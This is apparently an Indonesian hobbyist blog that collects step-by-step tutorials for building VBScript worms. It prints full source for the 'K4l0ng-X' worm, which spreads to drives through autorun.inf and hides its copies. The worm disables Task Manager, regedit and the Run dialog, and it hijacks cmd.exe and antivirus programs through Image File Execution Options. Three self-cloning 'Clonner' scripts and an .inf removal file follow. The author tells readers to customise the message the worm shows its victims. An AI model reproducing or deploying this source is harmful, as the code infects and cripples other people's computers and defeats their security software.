Membuat K4long-x Removal

Jika kalian sudah berhasil membuat Virus "K4l0ng-X",(Bagi yang belum, silahkan baca Membuat Virus K4l0ng-X) maka kalian harus menghilangkan efek Virus tersebut.
Langsung saja pada intinya, Caranya :

1. Buka Notepad atau Wordpad atau lainnya.
2. Salin Script di bawah :
   
   
   [Version]
   Signature="$Chicago$"
   Provider=Andree
   

   [DefaultInstall]
   AddReg=Ganti
   DelReg=Hapus
   

   [Ganti]
   HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
   HKCU,Software\Microsoft\Screensavers\TExt3D, DisplayString,0, "Microsoft Windows"
   

   [Hapus]
   HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
   HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
   HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
   HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
   HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
   HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
   HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
   HKLM, Software\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeCaption
   HKLM, Software\Microsoft\Windows NT\CurrentVersion\Winlogon, LegalNoticeText
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANSAV.exe\Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32-RTP.exe, Debugger
   HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe, Debugger
   
   
   
3. Simpan file tersebut, jangan lupa untuk mengganti pilihan "Text Document (*.txt)" menjadi "All Files" lalu beri nama "K4l0ng-X Removal.inf" (Tanpa tanda petik).
4. Klik kanan pada file tersebut, pilih Install.

Sekarang coba buka Command Promt di "Start -> All Programs -> Accessories -> Command Promt" maka akan terbuka jendela Command Promt yang asli (Jendela Berlayar hitam).
Sekarang efek K4l0ng-Xnya sudah lenyap ditelan K4l0ng-X Removal

Script Virus K4l0ng-X

Saya ingin berbagi pengetahuan dengan kalian, tapi Saya mau cerita dulu ya sebelum masuk ke inti pembicaraan. Itung-itung curhat, Hehehe....

Baca ya,

Pada zaman dahulu, hidup lah seorang Hacker...., Eeeeeh keliru!!! Ko' bisa nyasar ke Hacker ya.....??

Gini lho critanya, waktu itu Saya masih baru belajar membuat Virus Worm, dan melakukan pencarian artikel tentang Virus di "Om Google", dan Saya mendapatkan artikel yang isinya script virus worm yang namanya "Kalong_X", tapi Saya sudah lupa dapetnya dimana ya?? Ah, gak penting dapet dimana tak terusin critanya ya...., trus tak seberapa lama Windows Saya terkena virus worm, namanya "Four2One", setelah Saya teliti ternyata Script kedua Virus tersebut mirip abiz!!! Bedanya tipizzzz.....

Trus Saya coba memodifikasinya sedikit aja, gak pake banyak!!!

Maka jadilah Virus K4l0ng-X.


Lha sekarang masuk ke pembicaraan inti, jika kalian ingin mencoba Virus "K4l0ng-X" yang sudah teredit oleh Saya maka ikuti langkah-langkah ini :

(Awas!!! Jika Windows kalian terkena virus ini kalian tanggung sendiri yo...., Siapkan anti virus!!! Lebih aman pake Deep Freez aja biar ces-pleng!!!, tapi tenang aja karena Virus ini tidak terlalu berbahaya dan masih tergolong Virus Low!!!)


1.Virus ini tidak memerlukan Software khusus, cukup Notepad atau Wordpad atau program penyunting text lainnya.

2. Buka Program Notepad! bisa dibuka di "Start > All Programs > Accessories > Notepad"

3. Salin Script dibawah :

on error resume next
dim rute,windows,sadis,an,dree,isi,ony,k4l0ng_X,nitro,check,sido
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe k4l0ng-X.dll.vbs"
set an = createobject("Scripting.FileSystemObject")
set dree = an.getfile(Wscript.ScriptFullname)
dim text,size
size = dree.size
check = dree.drive.drivetype
set text = dree.openastextstream(1,-2)
do while not text.atendofstream
rute = rute & text.readline
rute = rute & vbcrlf
loop
do
Set windows = an.getspecialfolder(0)
Set windows = an.getspecialfolder(1)
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
set ony = an.createtextfile(windows & "\k4l0ng-X.dll.vbs",2,true)
ony.write rute
ony.close
set ony = an.getfile(windows & "\k4l0ng-X.dll.vbs")
ony.attributes = 39
for each sadis in an.drives
If (sadis.drivetype = 1 or sadis.drivetype = 2) and sadis.path <> "A:" then
set ony=an.getfile(sadis.path &"\k4l0ng-X32.dll.vbs")
ony.attributes =39
set ony=an.createtextfile(sadis.path &"\k4l0ng-X32.dll.vbs",2,true)
ony.write rute
ony.close
set ony=an.getfile(sadis.path &"\k4l0ng-Xt32.dll.vbs")
ony.attributes = 39
set ony =an.getfile(sadis.path &"\autorun.inf")
ony.attributes = 39
set ony=an.createtextfile(sadis.path &"\autorun.inf",2,true)
ony.write isi
ony.close
set ony = an.getfile(sadis.path &"\autorun.inf")
ony.attributes=39
end if
next
set k4l0ng_X = createobject("WScript.Shell")
set k4l0ng_X = createobject("WScript.Shell")
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE","%SystemRoot%\system32\sstext3d.scr"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut","60"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\ThemeFile","%SystemRoot%\resources\Themes\Windows Classic.theme"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Themes\LastTheme\Wallpaper","%SystemRoot%\Web\Wallpaper\Radiance.jpg"
k4l0ng_X.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: - K4L0NG-X_Menyerang!!! - ::"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\DisplayString","- K4L0NG-X VIRUZ -"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\FontFace","Colonna MT"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Screensavers\TExt3D\RotationStyle",3, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
k4l0ng_X.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0ng-X.dll.vbs"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", ".:K4l0ng-X:."
k4l0ng_X.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText","Komputermu terkena Virus K4L0NG-X!!!"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANSAV.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32-RTP.exe\Debugger","notepad.exe"
k4l0ng_X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe\Debugger","notepad.exe"
if check <> 1 then
Wscript.sleep 100000
end if
do
loop while check <> 1
set sido = createobject("Wscript.shell")
sido.run windows & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
loop

4. Kode yang berwarna merah bisa kalian rubah, begini penjelasannya :

• Kode yang bertuliskan ":: - K4L0NG-X_Menyerang!!! - ::" itu adalah judul window yang aka ditampilkan pada browser IE (Internet Explorer), bisa kalian rubah semau kalian.
• Kode yang bertuliskan "- K4L0NG-X VIRUZ -" adalah tulisan pada Screen Saver, kalo mau dirubah silahkan.
• Kode yang bertuliskan ".:K4l0ng-X:." itu adalah judul jendela konfirmasi sebelum logon ditampilkan, itu juga bisa dirubah.
• Kode yang bertuliskan "Komputermu terkena Virus K4L0NG-X!!!" adalah isi (pesan pembuat) pada jendela konfirmasi sebelum logon ditampilkan, isi pesan-pesan kalian kepada korban.

5. Simpan file tersebut, jangan lupa untuk mengganti pilihan "Text Document (*.txt)" menjadi "All Files" lalu beri nama "K4l0ng-X.vbs" (Tanpa tanda petik).

6. Jalankan file K4l0ng-X.vbs.
Ba!!!, komputer kalian sudah terkena Virus K4l0ng-X, Mungkin dengan segera Anti Virus kalian akan mendeteksi Virus tersebut, tetapi meskipun Virusnya sudah dihapus efeknya akan tetap beraksi. Kalo gak percaya coba buka Command Promt di "Start > All Programs > Accessories > Command Promt" maka akan terbuka "Notepad" dengan isi yang gak karu-karuan!!! dan masih banyak lagi kejanggalan-kejanggalan yang akan kalian temui pada komputer kalian sebelum efeknya dihilangkan.
Jika kalian ingin menghilangkan efek Virus tersebut, silahkan baca Artikel "Membuat K4l0ng-X Removal", disana Saya memberika Script yang bisa menghilangkan efek K4l0ng-X.



Good Luck!!!

Infeksi Folder Spesial

(Tutorial ini hanya bagi PEMULA. bagi yang sudah profesional, bisa diabaikan. Tapi kalo mau baca juga gak papa ko')

Jika Virus "Clonner" dan "Clonner Hidden" kemarin hanya mengcloning dirinya pada foldernya, maka Virus kali ini akan mengkloningkan dirinya ke Direktori/Folder Spesial yang dimiliki Windows yaitu Fonder Windows ataupun System32.

Biasanya para Virus Maker membuat Master/Induk virus pada Folder Spesial tersebut dan memberi nama mirip dengan data sistem lain, notepad.vbs/system.vbs/boot.vbs dan lain-lain yang bisa aktif kapan saja.
Begini cara membuatnya :

1. Buka Notepad atau lainnya.

2. Salin Script berikut :

On Error Resume Next
dim Vir,Rus,Clo,Ning,Special
set Vir=CreateObject("Scripting.FileSystemObject")
set Rus=Vir.opentextfile(wscript.ScriptFullName)
Clo=Rus.readall
Rus.close
Special=Vir.GetSpecialFolder(0)
for V =1 to 5
set Ning=Vir.CreateTextFile(Special & "\Clonner Wind" & V & ".vbs")
Ning.write Clo
Ning.close
next

Kode 0 dapat kalian ganti dengan 1 apabila ingin menempatkan induk virus pada folder System32. Dan bila mengganti kode 1 to 5 sebaiknya jangan terlalu banyak, agar Folder Wondows kalian tidak penuh dengan virus ini. Ini juga bisa ditambahkan atribut agar tersembunyi/hidden seperti pada Virus Clonner Hidden.
3. Selanjutnya simpan, jangan lupa seperti biasa trus kasih nama "Clonner Wind.vbs" (Tanpa tanda petik).

4. Jalankan file Clonner Wind.vbs.
Setelah Virus dijalankan coba kalian lihat pada Folder Windows kalian, biasanya di "C:\Windows\" maka didalamnya akan terdapat file baru bernama Clonner Wind1.vbs, sampai Clonner Wind5.vbs.
Wes disek yo, kesel ngetike...

Bikin Virus Clonner Hidden

(Tutorial ini hanya bagi PEMULA. bagi yang sudah profesional, bisa diabaikan. Tapi kalo mau baca juga gak papa ko')


Setelah kalian bisa mempraktekkan pembuatan Virus Clonner pada artikel "Bikin Virus Clonner", sekarang agar Clonner kalian tersembunyi atau hidden, kalian perlu menanbahkan atribut didalamnya.

Caranya :
1. Seperti biasa, buka Notepad atau lainnya.

2. Ini Scriptnya :

On Error Resume Next
dim Vir,Rus,Clo,Ning,Atrib
set Vir=CreateObject("Scripting.FileSystemObject")
set Rus=Vir.opentextfile(wscript.ScriptFullName)
Clo=Rus.readall
Rus.close
for V =1 to 700
set Ning=Vir.CreateTextFile("Clonner" & V & ".vbs")
Ning.write Clo
Ning.close
set Atrib=Vir.GetFile("Clonner" & r & ".vbs")
Atrib.Attributes=3
next

Kode Clonner.vbs asli adalah yang berwarna biru, yang berwarna merah adalah code agar hasil cloning beratribut hidden dan read only.
3. Simpan, jangan lupa untuk mengganti pilihan "Text Document (*.txt)" menjadi "All Files" lalu beri nama "Clonner Hidden.vbs" (Tanpa tanda petik).

4. Jalankan file Clonner Hidden.vbs.
Angka 3 pada attributes=3 menandakan file yang akan tercipta beratribut Hidden dan Read Only, kalian bisa menggantinya, ini keterangannya :

• Kode 0 = Atribut Nornal
• Kode 1 = Atribut Read Only
• Kode 2 = Atribut Hidden
• Kode 3 = Atribut Hidden + Read Only
• Kode 4 = Atribut System
• Kode 39 = Atribut Super Hidden

Tunggu beberapa saat, apabila fasilitas memperlihatkan file hidden pada Windows kalian nonaktifkan, seakan tidak terjadi apa-apa pada folder tersebut. Coba kalian aktifkan, bagi yang tidak tau caranya, silahkan Dari jendela Explorer klik menu Tools > Folder Options..., Pada dialog Folder Option pilih tab View, kemudian pada menu Hidden Files and Folders tandai Show hidden files and folders. Setelah itu maka hasil Cloning dari file "Clonner Hidden.vbs" baru lah bisa terlihat.
To be Continued....

Bikin Virus Clonner

(Tutorial ini hanya bagi PEMULA. bagi yang sudah profesional, bisa diabaikan. Tapi kalo mau baca juga gak papa ko')


Kalian pernah dengar istilah "Cloning"??
Yup!! Cloning adalah penggandaan pada suatu objek, dan itu berhubungan dengan pembuatan virus kali ini, Saya akan memberikan Script Worm yang dapat menngandakan dirinya sesuai kehendak kalian, tetapi penggandaan hanya terjadi pada direktori/folder dimana virus awal tersimpan dan tidak akan menjalar ke folder lain.

Virus lokal lokal yang menggunakan teknik ini adalah virus "Linong" yang membuat windows korban menjadi sesak dan lambat akibat banyaknya virus didalamnya.

Yuk dimulai :
1. Bukan Notepad atau Wordpad atau software penyunting text lainnya.

2. Salin Script berikut :

On Error Resume Next
dim Vir,Rus,Clo,Ning
set Vir=CreateObject("Scripting.FileSystemObject")
set Rus=Vir.opentextfile(wscript.ScriptFullName)
Clo=Rus.readall
Rus.close
for V =1 to 700
set Ning=Vir.CreateTextFile("Clonner" & V & ".vbs")
Ning.write Clo
Ning.close
next

3. Simpan file tersebut, jangan lupa untuk mengganti pilihan "Text Document (*.txt)" menjadi "All Files" lalu beri nama "Clonner.vbs" (Tanpa tanda petik).

NB : Sebaiknya file tersebut disimpan pada folder tersendiri.

4. Jalankan file Clonner.vbs.
Tunggu beberapa saat maka akan tercipta virus lain dengan nama Clonner1.vbs, Clonner2.vbs, dan seterusnya hingga Clonner700.vbs pada folder di mana file Clonner.vbs tersimpan, dan semua file tersebut berisi script yang sama dengan file Clonner.vbs.
O... iya hampir lupa, code yang Saya beri warna merah, tepatnya kode "1 to 700" adalah jumlah Cloning yang akan dihasilkan. Di sana Saya beri contoh 700 berarti Clonner.vbs yang akan tercipta adalah 1 sampai 700. Kalian bisa memodifikasinya sendiri sesuai kemauan.